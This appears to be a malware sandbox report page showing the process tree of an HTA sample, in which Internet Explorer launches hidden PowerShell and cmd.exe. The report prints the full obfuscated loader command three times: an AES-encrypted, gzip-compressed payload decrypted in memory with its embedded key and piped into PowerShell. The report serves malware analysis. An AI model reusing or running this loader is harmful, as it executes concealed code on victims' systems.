popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\htatest1.hta.html

    3068

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409

      1188

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell - }

        1564

        • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell -

          2504

          • powershell.exe powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv

            1328

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf